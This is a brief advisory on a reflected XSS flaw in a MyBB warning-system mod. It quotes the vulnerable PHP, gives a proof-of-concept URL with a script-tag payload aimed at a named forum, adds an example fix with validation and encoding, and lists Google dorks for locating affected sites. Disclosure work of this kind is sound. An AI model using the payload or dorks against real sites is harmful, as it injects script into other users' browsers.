MyBB (FWS Mod) reflected XSS
Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)
Vulnerable piece of code:
//USERCP AND PM CHANGES
elseif($file == "usercp.php" || $file == "private.php")
{
    if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0)
    {
        if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings']."%");
        // The warning level is concatenated into the src, alt and title attributes without any encoding
        $fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb->user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition;
    }
Example: http://mybboard.it/forum/fws.php?action=image&wl=/\<sCRIPT>alert("xss")</sCRIPT>\
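Added example (not the mod's own code): one way to build the same image tag with the warning level validated as an integer and encoded for each output context. The function names and the 0..100 range are assumptions. The page does not show how fws.php itself handles the wl parameter, so the same validation is assumed to apply there.

```php
<?php
// Added example, not part of the Forum Warning System mod.
// Assumption: the warning level is an integer percentage in 0..100.

/**
 * Validate an untrusted warning level (request parameter or stored value).
 * Returns the integer, or null when the input is not a plain in-range integer.
 */
function fws_parse_warning_level($raw): ?int
{
    if (!is_scalar($raw)) {
        return null; // arrays such as wl[]=1 are rejected
    }
    $level = filter_var((string)$raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 100],
    ]);
    return $level === false ? null : $level;
}

/** Build the <img> tag; every interpolated value is encoded for its context. */
function fws_warning_img($raw): string
{
    $level = fws_parse_warning_level($raw);
    if ($level === null || $level === 0) {
        return ''; // like the excerpt, emit nothing for level 0 or bad input
    }
    // URL context: let http_build_query encode the query string.
    $src = 'fws.php?' . http_build_query(['action' => 'image', 'wl' => $level]);
    // HTML attribute context: encode quotes, ampersands and angle brackets.
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    $label = $esc($level . '%');
    return '<img src="' . $esc($src) . '" alt="' . $label
         . '" title="' . $label . '" border="0" />';
}

// Constructed sample inputs, including the payload from the example URL above.
$samples = ['12', 12, '100', '0', '-5', '101', ['1'],
            '/\<sCRIPT>alert("xss")</sCRIPT>\\'];
foreach ($samples as $s) {
    printf("%-40s => %s\n", json_encode($s), fws_warning_img($s) ?: '(no output)');
}
```

Only the in-range integers produce markup; the script payload, the out-of-range values and the array all yield an empty string.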
Google dork: inurl:fws.php
"MyBB" inurl:fws.php